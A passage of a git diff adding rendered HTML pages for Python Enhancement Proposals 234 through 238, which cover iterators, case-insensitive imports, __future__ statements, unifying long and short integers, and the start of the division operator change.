  • Regarding if key in dict: there is no doubt that the dict.has_key(x) +interpretation of x in dict is by far the most useful interpretation, +probably the only useful one. There has been resistance against this because +x in list checks whether x is present among the values, while the +proposal makes x in dict check whether x is present among the keys. +Given that the symmetry between lists and dictionaries is very weak, this +argument does not have much weight.
  • +
  • The name iter() is an abbreviation. Alternatives proposed include +iterate(), traverse(), but these appear too long. Python has a +history of using abbrs for common builtins, e.g. repr(), str(), +len().

    Resolution: iter() it is.

    +
  • +
  • Using the same name for two different operations (getting an iterator from an +object and making an iterator for a function with a sentinel value) is +somewhat ugly. I haven’t seen a better name for the second operation though, +and since they both return an iterator, it’s easy to remember.

    Resolution: the builtin iter() takes an optional argument, which is the +sentinel to look for.

    +
  • +
  • Once a particular iterator object has raised StopIteration, will it also +raise StopIteration on all subsequent next() calls? Some say that it +would be useful to require this, others say that it is useful to leave this +open to individual iterators. Note that this may require an additional state +bit for some iterator implementations (e.g. function-wrapping iterators).

    Resolution: once StopIteration is raised, calling it.next() continues +to raise StopIteration.

    +

    Note: this was in fact not implemented in Python 2.2; there are many cases +where an iterator’s next() method can raise StopIteration on one call +but not on the next. This has been remedied in Python 2.3.

    +
  • +
  • It has been proposed that a file object should be its own iterator, with a +next() method returning the next line. This has certain advantages, and +makes it even clearer that this iterator is destructive. The disadvantage is +that this would make it even more painful to implement the “sticky +StopIteration” feature proposed in the previous bullet.

    Resolution: tentatively rejected (though there are still people arguing for +this).

    +
  • +
  • Some folks have requested extensions of the iterator protocol, e.g. +prev() to get the previous item, current() to get the current item +again, finished() to test whether the iterator is finished, and maybe +even others, like rewind(), __len__(), position().

    While some of these are useful, many of these cannot easily be implemented +for all iterator types without adding arbitrary buffering, and sometimes they +can’t be implemented at all (or not reasonably). E.g. anything to do with +reversing directions can’t be done when iterating over a file or function. +Maybe a separate PEP can be drafted to standardize the names for such +operations when they are implementable.

    +

    Resolution: rejected.

    +
  • +
  • There has been a long discussion about whether
    for x in dict: ...
    +
    +
    +

    should assign x the successive keys, values, or items of the dictionary. +The symmetry between if x in y and for x in y suggests that it should +iterate over keys. This symmetry has been observed by many independently and +has even been used to “explain” one using the other. This is because for +sequences, if x in y iterates over y comparing the iterated values to +x. If we adopt both of the above proposals, this will also hold for +dictionaries.

    +

    The argument against making for x in dict iterate over the keys comes +mostly from a practicality point of view: scans of the standard library show +that there are about as many uses of for x in dict.items() as there are +of for x in dict.keys(), with the items() version having a small +majority. Presumably many of the loops using keys() use the +corresponding value anyway, by writing dict[x], so (the argument goes) by +making both the key and value available, we could support the largest number +of cases. While this is true, I (Guido) find the correspondence between +for x in dict and if x in dict too compelling to break, and there’s +not much overhead in having to write dict[x] to explicitly get the value.

    +

    For fast iteration over items, use for key, value in dict.iteritems(). +I’ve timed the difference between

    +
    for key in dict: dict[key]
    +
    +
    +

    and

    +
    for key, value in dict.iteritems(): pass
    +
    +
    +

    and found that the latter is only about 7% faster.

    +

    Resolution: By BDFL pronouncement, for x in dict iterates over the keys, +and dictionaries have iteritems(), iterkeys(), and itervalues() +to return the different flavors of dictionary iterators.

    +
  • +
+
+
+

Mailing Lists

+

The iterator protocol has been discussed extensively in a mailing list on +SourceForge:

+
+
+

Initially, some of the discussion was carried out at Yahoo; archives are still +accessible:

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0234.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0235/index.html b/pep-0235/index.html new file mode 100644 index 00000000000..13d7620b075 --- /dev/null +++ b/pep-0235/index.html @@ -0,0 +1,252 @@ PEP 235 – Import on Case-Insensitive Platforms | peps.python.org
+
+

+
+
+

PEP 235 – Import on Case-Insensitive Platforms

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Feb-2001
+
Python-Version:
+
2.1
+
Post-History:
+
16-Feb-2001
+
+
+
+
+
+

Note

+

This is essentially a retroactive PEP: the issue came up too late +in the 2.1 release process to solicit wide opinion before deciding +what to do, and can’t be put off until 2.2 without also delaying +the Cygwin and MacOS X ports.

+
+
+

Motivation

+

File systems vary across platforms in whether or not they preserve +the case of filenames, and in whether or not the platform C +library file-opening functions do or don’t insist on +case-sensitive matches:

+
                     case-preserving     case-destroying
+                 +-------------------+------------------+
+case-sensitive   | most Unix flavors | brrrrrrrrrr      |
+                 +-------------------+------------------+
+case-insensitive | Windows           | some unfortunate |
+                 | MacOSX HFS+       | network schemes  |
+                 | Cygwin            |                  |
+                 |                   | OpenVMS          |
+                 +-------------------+------------------+
+
+
+

In the upper left box, if you create “fiLe” it’s stored as “fiLe”, +and only open("fiLe") will open it (open("file") will not, nor +will the 14 other variations on that theme).

+

In the lower right box, if you create “fiLe”, there’s no telling +what it’s stored as – but most likely as “FILE” – and any of the +16 obvious variations on open("FilE") will open it.

+

The lower left box is a mix: creating “fiLe” stores “fiLe” in the +platform directory, but you don’t have to match case when opening +it; any of the 16 obvious variations on open("FILe") work.

+

NONE OF THAT IS CHANGING! Python will continue to follow platform +conventions w.r.t. whether case is preserved when creating a file, +and w.r.t. whether open() requires a case-sensitive match. In +practice, you should always code as if matches were +case-sensitive, else your program won’t be portable.

+

What’s proposed is to change the semantics of Python “import” +statements, and there only in the lower left box.

+
+
+

Current Lower-Left Semantics

+

Support for MacOSX HFS+, and for Cygwin, is new in 2.1, so nothing +is changing there. What’s changing is Windows behavior. Here are +the current rules for import on Windows:

+
    +
  1. Despite that the filesystem is case-insensitive, Python insists +on a case-sensitive match. But not in the way the upper left +box works: if you have two files, FiLe.py and file.py on +sys.path, and do
    import file
    +
    +
    +

    then if Python finds FiLe.py first, it raises a NameError. +It does not go on to find file.py; indeed, it’s impossible to +import any but the first case-insensitive match on sys.path, +and then only if case matches exactly in the first +case-insensitive match.

    +
  2. +
  3. An ugly exception: if the first case-insensitive match on +sys.path is for a file whose name is entirely in upper case +(FILE.PY or FILE.PYC or FILE.PYO), then the import silently +grabs that, no matter what mixture of case was used in the +import statement. This is apparently to cater to miserable old +filesystems that really fit in the lower right box. But this +exception is unique to Windows, for reasons that may or may not +exist.
  4. +
  5. And another exception: if the environment variable PYTHONCASEOK +exists, Python silently grabs the first case-insensitive match +of any kind.
  6. +
+

So these Windows rules are pretty complicated, and neither match +the Unix rules nor provide semantics natural for the native +filesystem. That makes them hard to explain to Unix or Windows +users. Nevertheless, they’ve worked fine for years, and in +isolation there’s no compelling reason to change them.

+

However, that was before the MacOSX HFS+ and Cygwin ports arrived. +They also have case-preserving case-insensitive filesystems, but +the people doing the ports despised the Windows rules. Indeed, a +patch to make HFS+ act like Unix for imports got past a reviewer +and into the code base, which incidentally made Cygwin also act +like Unix (but this met the unbounded approval of the Cygwin +folks, so they sure didn’t complain – they had patches of their +own pending to do this, but the reviewer for those balked).

+

At a higher level, we want to keep Python consistent, by following +the same rules on all platforms with case-preserving +case-insensitive filesystems.

+
+
+

Proposed Semantics

+

The proposed new semantics for the lower left box:

+
    +
  1. If the PYTHONCASEOK environment variable exists, same as +before: silently accept the first case-insensitive match of any +kind; raise ImportError if none found.
  2. +
  3. Else search sys.path for the first case-sensitive match; raise +ImportError if none found.
  4. +
+

#B is the same rule as is used on Unix, so this will improve cross-platform portability. That’s good. #B is also the rule the Mac and Cygwin folks want (and wanted enough to implement themselves, multiple times, which is a powerful argument in PythonLand). It can’t cause any existing non-exceptional Windows import to fail, because any existing non-exceptional Windows import finds a case-sensitive match first in the path – and it still will. An exceptional Windows import currently blows up with a NameError or ImportError; in the latter case it still will, and in the former case it will continue searching, and either succeed or blow up with an ImportError.

+

#A is needed to cater to case-destroying filesystems mounted on Windows, +and may also be used by people so enamored of “natural” Windows +behavior that they’re willing to set an environment variable to +get it. I don’t intend to implement #A for Unix too, but that’s +just because I’m not clear on how I could do so efficiently (I’m +not going to slow imports under Unix just for theoretical purity).
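A sketch of the two rules in Python (illustrative only; the real logic lives in the C import machinery):

+
import os
+
+def find_module_file(name, path, caseok):
+    # caseok is true when PYTHONCASEOK is set (rule #A);
+    # otherwise only an exact-case match counts (rule #B).
+    fname = name + '.py'
+    for dirname in path:
+        try:
+            files = os.listdir(dirname)
+        except os.error:
+            continue
+        for f in files:
+            if f == fname:
+                return os.path.join(dirname, f)
+            if caseok and f.lower() == fname.lower():
+                return os.path.join(dirname, f)
+    raise ImportError, 'No module named ' + name
+
+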

+

The potential damage is here: #2 (matching on ALLCAPS.PY) is +proposed to be dropped. Case-destroying filesystems are a +vanishing breed, and support for them is ugly. We’re already +supporting (and will continue to support) PYTHONCASEOK for their +benefit, but they don’t deserve multiple hacks in 2001.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0235.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0236/index.html b/pep-0236/index.html new file mode 100644 index 00000000000..8d54a1e0fe8 --- /dev/null +++ b/pep-0236/index.html @@ -0,0 +1,467 @@ PEP 236 – Back to the __future__ | peps.python.org
+
+

+
+
+

PEP 236 – Back to the __future__

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2001
+
Python-Version:
+
2.1
+
Post-History:
+
26-Feb-2001
+
+
+
+
+
+

Motivation

+

From time to time, Python makes an incompatible change to the advertised +semantics of core language constructs, or changes their accidental +(implementation-dependent) behavior in some way. While this is never done +capriciously, and is always done with the aim of improving the language over +the long term, over the short term it’s contentious and disrupting.

+

PEP 5, Guidelines for Language Evolution suggests ways to ease the pain, +and this PEP introduces some machinery in support of that.

+

PEP 227, Statically Nested Scopes is the first application, and will be +used as an example here.

+
+
+

Intent

+

[Note: This is policy, and so should eventually move into PEP 5]

+

When an incompatible change to core language syntax or semantics is being +made:

+
    +
  1. The release C that introduces the change does not change the syntax or +semantics by default.
  2. +
  3. A future release R is identified in which the new syntax or semantics will +be enforced.
  4. +
  5. The mechanisms described in PEP 230, Warning Framework are used to +generate warnings, whenever possible, about constructs or operations whose +meaning may [1] change in release R.
  6. +
  7. The new future_statement (see below) can be explicitly included in a module +M to request that the code in module M use the new syntax or semantics in +the current release C.
  8. +
+

So old code continues to work by default, for at least one release, although +it may start to generate new warning messages. Migration to the new syntax or +semantics can proceed during that time, using the future_statement to make +modules containing it act as if the new syntax or semantics were already being +enforced.

+

Note that there is no need to involve the future_statement machinery in new features unless they can break existing code; fully backward-compatible additions can – and should – be introduced without a corresponding future_statement.

+
+
+

Syntax

+

A future_statement is simply a from/import statement using the reserved module +name __future__:

+
future_statement: "from" "__future__" "import" feature ["as" name]
+                  (","feature ["as" name])*
+
+feature: identifier
+name: identifier
+
+
+

In addition, all future_statements must appear near the top of the module. The +only lines that can appear before a future_statement are:

+
    +
  • The module docstring (if any).
  • +
  • Comments.
  • +
  • Blank lines.
  • +
  • Other future_statements.
  • +
+

Example:

+
"""This is a module docstring."""
+
+# This is a comment, preceded by a blank line and followed by
+# a future_statement.
+from __future__ import nested_scopes
+
+from math import sin
+from __future__ import alabaster_weenoblobs  # compile-time error!
+# That was an error because preceded by a non-future_statement.
+
+
+
+
+

Semantics

+

A future_statement is recognized and treated specially at compile time: +changes to the semantics of core constructs are often implemented by +generating different code. It may even be the case that a new feature +introduces new incompatible syntax (such as a new reserved word), in which +case the compiler may need to parse the module differently. Such decisions +cannot be pushed off until runtime.

+

For any given release, the compiler knows which feature names have been +defined, and raises a compile-time error if a future_statement contains a +feature not known to it [2].

+

The direct runtime semantics are the same as for any import statement: +there is a standard module __future__.py, described later, and it will be +imported in the usual way at the time the future_statement is executed.

+

The interesting runtime semantics depend on the specific feature(s) +“imported” by the future_statement(s) appearing in the module.

+

Note that there is nothing special about the statement:

+
import __future__ [as name]
+
+
+

That is not a future_statement; it’s an ordinary import statement, with no +special semantics or syntax restrictions.

+
+
+

Example

+

Consider this code, in file scope.py:

+
x = 42
+def f():
+    x = 666
+    def g():
+        print "x is", x
+    g()
+f()
+
+
+

Under 2.0, it prints:

+
x is 42
+
+
+

Nested scopes (PEP 227) are being introduced in 2.1. But under 2.1, it still +prints:

+
x is 42
+
+
+

and also generates a warning.

+

In 2.2, and also in 2.1 if from __future__ import nested_scopes is +included at the top of scope.py, it prints:

+
x is 666
+
+
+
+
+

Standard Module __future__.py

+

Lib/__future__.py is a real module, and serves three purposes:

+
    +
  1. To avoid confusing existing tools that analyze import statements and expect +to find the modules they’re importing.
  2. +
  3. To ensure that future_statements run under releases prior to 2.1 at least +yield runtime exceptions (the import of __future__ will fail, because +there was no module of that name prior to 2.1).
  4. +
  5. To document when incompatible changes were introduced, and when they will +be– or were –made mandatory. This is a form of executable documentation, +and can be inspected programmatically via importing __future__ and +examining its contents.
  6. +
+

Each statement in __future__.py is of the form:

+
FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ")"
+
+
+

where, normally, OptionalRelease < MandatoryRelease, and both are +5-tuples of the same form as sys.version_info:

+
(PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int
+ PY_MINOR_VERSION, # the 1; an int
+ PY_MICRO_VERSION, # the 0; an int
+ PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string
+ PY_RELEASE_SERIAL # the 3; an int
+)
+
+
+

OptionalRelease records the first release in which:

+
from __future__ import FeatureName
+
+
+

was accepted.

+

In the case of MandatoryReleases that have not yet occurred, +MandatoryRelease predicts the release in which the feature will become part +of the language.

+

Else MandatoryRelease records when the feature became part of the language; +in releases at or after that, modules no longer need:

+
from __future__ import FeatureName
+
+
+

to use the feature in question, but may continue to use such imports.

+

MandatoryRelease may also be None, meaning that a planned feature got +dropped.

+

Instances of class _Feature have two corresponding methods, +.getOptionalRelease() and .getMandatoryRelease().

+

No feature line will ever be deleted from __future__.py.

+

Example line:

+
nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "final", 0))
+
+
+

This means that:

+
from __future__ import nested_scopes
+
+
+

will work in all releases at or after 2.1b1, and that nested_scopes are +intended to be enforced starting in release 2.2.
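Because __future__ is an ordinary module, this record can be inspected programmatically; a small sketch:

+
import __future__
+import sys
+
+feature = __future__.nested_scopes
+print feature.getOptionalRelease()     # (2, 1, 0, "beta", 1)
+print feature.getMandatoryRelease()    # (2, 2, 0, "final", 0)
+
+if sys.version_info >= feature.getMandatoryRelease():
+    print "nested scopes are always enabled in this release"
+
+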

+
+
+

Resolved Problem: Runtime Compilation

+

Several Python features can compile code during a module’s runtime:

+
    +
  1. The exec statement.
  2. +
  3. The execfile() function.
  4. +
  5. The compile() function.
  6. +
  7. The eval() function.
  8. +
  9. The input() function.
  10. +
+

Since a module M containing a future_statement naming feature F explicitly +requests that the current release act like a future release with respect to F, +any code compiled dynamically from text passed to one of these from within M +should probably also use the new syntax or semantics associated with F. The +2.1 release does behave this way.
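For example, re-using the scope.py code from the Example section, a future_statement near the top of dynamically compiled text governs that code block (a sketch of the 2.1 behavior):

+
src = '''
+from __future__ import nested_scopes
+
+x = 42
+def f():
+    x = 666
+    def g():
+        print "x is", x
+    g()
+f()
+'''
+exec src    # prints "x is 666" under 2.1: the future_statement
+            # applies to the dynamically compiled block
+
+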

+

This isn’t always desired, though. For example, doctest.testmod(M) +compiles examples taken from strings in M, and those examples should use M’s +choices, not necessarily the doctest module’s choices. In the 2.1 release, +this isn’t possible, and no scheme has yet been suggested for working around +this. NOTE: PEP 264 later addressed this in a flexible way, by adding +optional arguments to compile().

+

In any case, a future_statement appearing “near the top” (see Syntax above) of +text compiled dynamically by an exec, execfile() or compile() +applies to the code block generated, but has no further effect on the module +that executes such an exec, execfile() or compile(). This can’t +be used to affect eval() or input(), however, because they only allow +expression input, and a future_statement is not an expression.

+
+
+

Resolved Problem: Native Interactive Shells

+

There are two ways to get an interactive shell:

+
    +
  1. By invoking Python from a command line without a script argument.
  2. +
  3. By invoking Python from a command line with the -i switch and with a +script argument.
  4. +
+

An interactive shell can be seen as an extreme case of runtime compilation +(see above): in effect, each statement typed at an interactive shell prompt +runs a new instance of exec, compile() or execfile(). A +future_statement typed at an interactive shell applies to the rest of the +shell session’s life, as if the future_statement had appeared at the top of a +module.

+
+
+

Resolved Problem: Simulated Interactive Shells

+

Interactive shells “built by hand” (by tools such as IDLE and the Emacs +Python-mode) should behave like native interactive shells (see above). +However, the machinery used internally by native interactive shells has not +been exposed, and there isn’t a clear way for tools building their own +interactive shells to achieve the desired behavior.

+

NOTE: PEP 264 later addressed this, by adding intelligence to the standard +codeop.py. Simulated shells that don’t use the standard library shell +helpers can get a similar effect by exploiting the new optional arguments to +compile() added by PEP 264.

+
+
+

Questions and Answers

+
+

What about a “from __past__” version, to get back old behavior?

+

Outside the scope of this PEP. Seems unlikely to the author, though. Write a +PEP if you want to pursue it.

+
+
+

What about incompatibilities due to changes in the Python virtual machine?

+

Outside the scope of this PEP, although PEP 5 suggests a grace period +there too, and the future_statement may also have a role to play there.

+
+
+

What about incompatibilities due to changes in Python’s C API?

+

Outside the scope of this PEP.

+
+
+

I want to wrap future_statements in try/except blocks, so I can use different code depending on which version of Python I’m running. Why can’t I?

+

Sorry! try/except is a runtime feature; future_statements are primarily +compile-time gimmicks, and your try/except happens long after the compiler +is done. That is, by the time you do try/except, the semantics in effect +for the module are already a done deal. Since the try/except wouldn’t +accomplish what it looks like it should accomplish, it’s simply not allowed. +We also want to keep these special statements very easy to find and to +recognize.

+

Note that you can import __future__ directly, and use the information in +it, along with sys.version_info, to figure out where the release you’re +running under stands in relation to a given feature’s status.

+
+
+

Going back to the nested_scopes example, what if release 2.2 comes along and I still haven’t changed my code? How can I keep the 2.1 behavior then?

+

By continuing to use 2.1, and not moving to 2.2 until you do change your +code. The purpose of future_statement is to make life easier for people who +keep current with the latest release in a timely fashion. We don’t hate you +if you don’t, but your problems are much harder to solve, and somebody with +those problems will need to write a PEP addressing them. future_statement is +aimed at a different audience.

+
+
+

Overloading import sucks. Why not introduce a new statement for this?

+

Like maybe lambda lambda nested_scopes? That is, unless we introduce a +new keyword, we can’t introduce an entirely new statement. But if we +introduce a new keyword, that in itself would break old code. That would be +too ironic to bear. Yes, overloading import does suck, but not as +energetically as the alternatives – as is, future_statements are 100% +backward compatible.

+
+
+ +
+

References and Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0236.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0237/index.html b/pep-0237/index.html new file mode 100644 index 00000000000..0361913ad55 --- /dev/null +++ b/pep-0237/index.html @@ -0,0 +1,421 @@ PEP 237 – Unifying Long Integers and Integers | peps.python.org
+
+

+
+
+

PEP 237 – Unifying Long Integers and Integers

+
+
Author:
+
Moshe Zadka, Guido van Rossum
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001, 14-Aug-2001, 23-Aug-2001
+
+
+
+
+
+

Abstract

+

Python currently distinguishes between two kinds of integers (ints): regular +or short ints, limited by the size of a C long (typically 32 or 64 bits), and +long ints, which are limited only by available memory. When operations on +short ints yield results that don’t fit in a C long, they raise an error. +There are some other distinctions too. This PEP proposes to do away with most +of the differences in semantics, unifying the two types from the perspective +of the Python user.

+
+
+

Rationale

+

Many programs find a need to deal with larger numbers after the fact, and +changing the algorithms later is bothersome. It can hinder performance in the +normal case, when all arithmetic is performed using long ints whether or not +they are needed.

+

Having the machine word size exposed to the language hinders portability. For example, Python source files and .pyc files are not portable between 32-bit and 64-bit machines because of this.

+

There is also the general desire to hide unnecessary details from the Python +user when they are irrelevant for most applications. An example is memory +allocation, which is explicit in C but automatic in Python, giving us the +convenience of unlimited sizes on strings, lists, etc. It makes sense to +extend this convenience to numbers.

+

It will give new Python programmers (whether they are new to programming in +general or not) one less thing to learn before they can start using the +language.

+
+
+

Implementation

+

Initially, two alternative implementations were proposed (one by each author):

+
    +
  1. The PyInt type’s slot for a C long will be turned into a:
    union {
    +    long i;
    +    struct {
    +        unsigned long length;
    +        digit digits[1];
    +    } bignum;
    +};
    +
    +
    +

    Only the n-1 lower bits of the long have any meaning; the top bit +is always set. This distinguishes the union. All PyInt functions +will check this bit before deciding which types of operations to use.

    +
  2. +
3. The existing short and long int types remain, but operations return a long int instead of raising OverflowError when a result cannot be represented as a short int. A new type, integer, may be introduced as an abstract base type from which both the int and long implementation types derive. This is useful so that programs can check integer-ness with a single test:
    if isinstance(i, integer): ...
    +
    +
    +
  4. +
+

After some consideration, the second implementation plan was selected, since +it is far easier to implement, is backwards compatible at the C API level, and +in addition can be implemented partially as a transitional measure.

+
+
+

Incompatibilities

+

The following operations have (usually subtly) different semantics for short and for long integers, and one or the other will have to be changed somehow. This is intended to be an exhaustive list. If you know of any other operations that differ in outcome depending on whether a short or a long int with the same value is passed, please write the second author.

+
    +
• Currently, all arithmetic operators on short ints except << raise OverflowError if the result cannot be represented as a short int. This will be changed to return a long int instead (see the sketch after this list). The following operators can currently raise OverflowError: x+y, x-y, x*y, x**y, divmod(x, y), x/y, x%y, and -x. (The last four can only overflow when the value -sys.maxint-1 is involved.)
  • +
  • Currently, x<<n can lose bits for short ints. This will be changed to +return a long int containing all the shifted-out bits, if returning a short +int would lose bits (where changing sign is considered a special case of +losing bits).
  • +
  • Currently, hex and oct literals for short ints may specify negative values; +for example 0xffffffff == -1 on a 32-bit machine. This will be changed +to equal 0xffffffffL (2**32-1).
  • +
  • Currently, the %u, %x, %X and %o string formatting operators +and the hex() and oct() built-in functions behave differently for +negative numbers: negative short ints are formatted as unsigned C long, +while negative long ints are formatted with a minus sign. This will be +changed to use the long int semantics in all cases (but without the trailing +L that currently distinguishes the output of hex() and oct() for +long ints). Note that this means that %u becomes an alias for %d. +It will eventually be removed.
  • +
  • Currently, repr() of a long int returns a string ending in L while +repr() of a short int doesn’t. The L will be dropped; but not before +Python 3.0.
  • +
  • Currently, an operation with long operands will never return a short int. +This may change, since it allows some optimization. (No changes have been +made in this area yet, and none are planned.)
  • +
  • The expression type(x).__name__ depends on whether x is a short or a +long int. Since implementation alternative 2 is chosen, this difference +will remain. (In Python 3.0, we may be able to deploy a trick to hide the +difference, because it is annoying to reveal the difference to user code, +and more so as the difference between the two types is less visible.)
  • +
• Long and short ints are handled differently by the marshal module, and by the pickle and cPickle modules. This difference will remain (at least until Python 3.0).
  • +
  • Short ints with small values (typically between -1 and 99 inclusive) are +interned – whenever a result has such a value, an existing short int with +the same value is returned. This is not done for long ints with the same +values. This difference will remain. (Since there is no guarantee of this +interning, it is debatable whether this is a semantic difference – but code +may exist that uses is for comparisons of short ints and happens to work +because of this interning. Such code may fail if used with long ints.)
  • +
+
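As an illustrative sketch (not part of the PEP's text), here is how the first incompatibility above plays out, assuming a 32-bit machine where sys.maxint == 2**31 - 1:

import sys

# Python 2.1 (classic behavior):
#   sys.maxint + 1  ==> OverflowError: integer addition
# After unification (transition phase 1):
#   sys.maxint + 1  ==> 2147483648L, a long int
x = sys.maxint + 1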
+
+

Literals

+

A trailing L at the end of an integer literal will stop having any meaning, and will eventually become illegal. The compiler will choose the appropriate type solely based on the value. (Until Python 3.0, it will force the literal to be a long; but literals without a trailing L may also be long, if they are not representable as short ints.)

+
+
+

Built-in Functions

+

The function int() will return a short or a long int depending on the +argument value. In Python 3.0, the function long() will call the function +int(); before then, it will continue to force the result to be a long int, +but otherwise work the same way as int(). The built-in name long will +remain in the language to represent the long implementation type (unless it is +completely eradicated in Python 3.0), but using the int() function is +still recommended, since it will automatically return a long when needed.
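A brief sketch of the behavior described above, in Python 2.x terms:

int(3.9)    # 3, a short int
int(1e19)   # 10000000000000000000L: a long, returned automatically when needed
long(3)     # 3L: still forced to a long until Python 3.0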

+
+
+

C API

+

The C API remains unchanged; C code will still need to be aware of the +difference between short and long ints. (The Python 3.0 C API will probably +be completely incompatible.)

+

The PyArg_Parse*() APIs already accept long ints, as long as they are +within the range representable by C ints or longs, so that functions taking C +int or long argument won’t have to worry about dealing with Python longs.

+
+
+

Transition

+

There are three major phases to the transition:

+
    +
  1. Short int operations that currently raise OverflowError return a long +int value instead. This is the only change in this phase. Literals will +still distinguish between short and long ints. The other semantic +differences listed above (including the behavior of <<) will remain. +Because this phase only changes situations that currently raise +OverflowError, it is assumed that this won’t break existing code. +(Code that depends on this exception would have to be too convoluted to be +concerned about it.) For those concerned about extreme backwards +compatibility, a command line option (or a call to the warnings module) +will allow a warning or an error to be issued at this point, but this is +off by default.
  2. +
  3. The remaining semantic differences are addressed. In all cases the long +int semantics will prevail. Since this will introduce backwards +incompatibilities which will break some old code, this phase may require a +future statement and/or warnings, and a prolonged transition phase. The +trailing L will continue to be used for longs as input and by +repr().
      +
    1. Warnings are enabled about operations that will change their numeric +outcome in stage 2B, in particular hex() and oct(), %u, +%x, %X and %o, hex and oct literals in the +(inclusive) range [sys.maxint+1, sys.maxint*2+1], and left shifts +losing bits.
    2. +
3. The new semantics for these operations are implemented. Operations that give different results than before will not issue a warning.
    4. +
    +
  4. +
  5. The trailing L is dropped from repr(), and made illegal on input. +(If possible, the long type completely disappears.) The trailing L +is also dropped from hex() and oct().
  6. +
+

Phase 1 will be implemented in Python 2.2.

+

Phase 2 will be implemented gradually, with 2A in Python 2.3 and 2B in +Python 2.4.

+

Phase 3 will be implemented in Python 3.0 (at least two years after Python 2.4 +is released).

+
+
+

OverflowWarning

+

Here are the rules that guide warnings generated in situations that currently raise OverflowError. This applies to transition phase 1. Historical note: although phase 1 was completed in Python 2.2, and phase 2A in Python 2.3, nobody noticed that OverflowWarning was still generated in Python 2.3. It was finally disabled in Python 2.4. The Python builtin OverflowWarning, and the corresponding C API PyExc_OverflowWarning, are no longer generated or used in Python 2.4, but will remain for the (unlikely) case of user code until Python 2.5.

+
    +
  • A new warning category is introduced, OverflowWarning. This is a +built-in name.
  • +
  • If an int result overflows, an OverflowWarning warning is issued, with a +message argument indicating the operation, e.g. “integer addition”. This +may or may not cause a warning message to be displayed on sys.stderr, or +may cause an exception to be raised, all under control of the -W command +line and the warnings module.
  • +
  • The OverflowWarning warning is ignored by default.
  • +
  • The OverflowWarning warning can be controlled like all warnings, via the +-W command line option or via the warnings.filterwarnings() call. +For example:
    python -Wdefault::OverflowWarning
    +
    +
    +

causes the OverflowWarning to be displayed the first time it occurs at a particular source line, and:

    +
    python -Werror::OverflowWarning
    +
    +
    +

causes the OverflowWarning to be turned into an exception whenever it happens. The following code enables the warning from inside the program:

    +
    import warnings
    +warnings.filterwarnings("default", "", OverflowWarning)
    +
    +
    +

    See the python man page for the -W option and the warnings +module documentation for filterwarnings().

    +
  • +
  • If the OverflowWarning warning is turned into an error, +OverflowError is substituted. This is needed for backwards +compatibility.
  • +
• Unless the warning is turned into an exception, the result of the operation (e.g., x+y) is recomputed after converting the arguments to long ints.
  • +
+
+
+

Example

+

If you pass a long int to a C function or built-in operation that takes an +integer, it will be treated the same as a short int as long as the value fits +(by virtue of how PyArg_ParseTuple() is implemented). If the long value +doesn’t fit, it will still raise an OverflowError. For example:

+
def fact(n):
+    if n <= 1:
+        return 1
+    return n*fact(n-1)
+
+A = "ABCDEFGHIJKLMNOPQ"
+n = input("Gimme an int: ")
+print A[fact(n)%17]
+
+
+

For n >= 13, this currently raises OverflowError (unless the user +enters a trailing L as part of their input), even though the calculated +index would always be in range(17). With the new approach this code will +do the right thing: the index will be calculated as a long int, but its value +will be in range.

+
+
+

Resolved Issues

+

These issues, previously open, have been resolved.

+
    +
  • hex() and oct() applied to longs will continue to produce a trailing +L until Python 3000. The original text above wasn’t clear about this, +but since it didn’t happen in Python 2.4 it was thought better to leave it +alone. BDFL pronouncement here:

    https://mail.python.org/pipermail/python-dev/2006-June/065918.html

    +
  • +
  • What to do about sys.maxint? Leave it in, since it is still relevant +whenever the distinction between short and long ints is still relevant (e.g. +when inspecting the type of a value).
  • +
  • Should we remove %u completely? Remove it.
  • +
  • Should we warn about << not truncating integers? Yes.
  • +
  • Should the overflow warning be on a portable maximum size? No.
  • +
+
+
+

Implementation

+

The implementation work for the Python 2.x line is completed; phase 1 was +released with Python 2.2, phase 2A with Python 2.3, and phase 2B will be +released with Python 2.4 (and is already in CVS).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0237.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0238/index.html b/pep-0238/index.html new file mode 100644 index 00000000000..2ae1adcca89 --- /dev/null +++ b/pep-0238/index.html @@ -0,0 +1,581 @@ + + + + + + + + PEP 238 – Changing the Division Operator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 238 – Changing the Division Operator

+
+
Author:
+
Moshe Zadka <moshez at zadka.site.co.il>, +Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001, 26-Jul-2001, 27-Jul-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

The current division (/) operator has an ambiguous meaning for numerical +arguments: it returns the floor of the mathematical result of division if the +arguments are ints or longs, but it returns a reasonable approximation of the +division result if the arguments are floats or complex. This makes +expressions expecting float or complex results error-prone when integers are +not expected but possible as inputs.

+

We propose to fix this by introducing different operators for different +operations: x/y to return a reasonable approximation of the mathematical +result of the division (“true division”), x//y to return the floor +(“floor division”). We call the current, mixed meaning of x/y +“classic division”.
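A sketch of the three meanings with int and float operands:

1 / 2      # classic division: 0 (both operands are ints)
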